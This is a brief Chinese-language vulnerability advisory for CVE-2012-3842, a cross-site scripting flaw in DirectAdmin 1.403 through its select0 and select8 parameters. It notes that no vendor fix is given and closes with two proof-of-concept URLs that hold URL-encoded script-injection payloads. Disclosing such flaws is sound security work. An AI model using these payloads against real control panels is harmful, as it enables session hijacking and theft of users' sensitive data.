Bugtraq ID: 53281
CVE ID: CVE-2012-3842
DirectAdmin是一款功能强大的虚拟主机在线管理系统。
DirectAdmin脚本存在跨站脚本漏洞,允许攻击者通过select0或select8参数注入任意WEB脚本或HTML,远程攻击者可以利用漏洞获得敏感信息或劫持用户会话。
0
DirectAdmin 1.403
厂商解决方案
目前没有详细解决方案提供:
http://directadmin.com/
https://your.ip.to.directadmin:2222/CMD_DOMAIN?action=select&delete=Delete&select8=testtttttttt.plaaaaaa
%22%3Eaaaaaaaaaaaa%3Cscript%3Ealert%28VL%29%3C/script%3E
https://your.ip.to.directadmin:2222/CMD_DOMAIN?confirmed=Confirm&delete=yes&select0=testtttttttt.pl
%3Cscript%3Ealert%28VL%29%3C/script%3E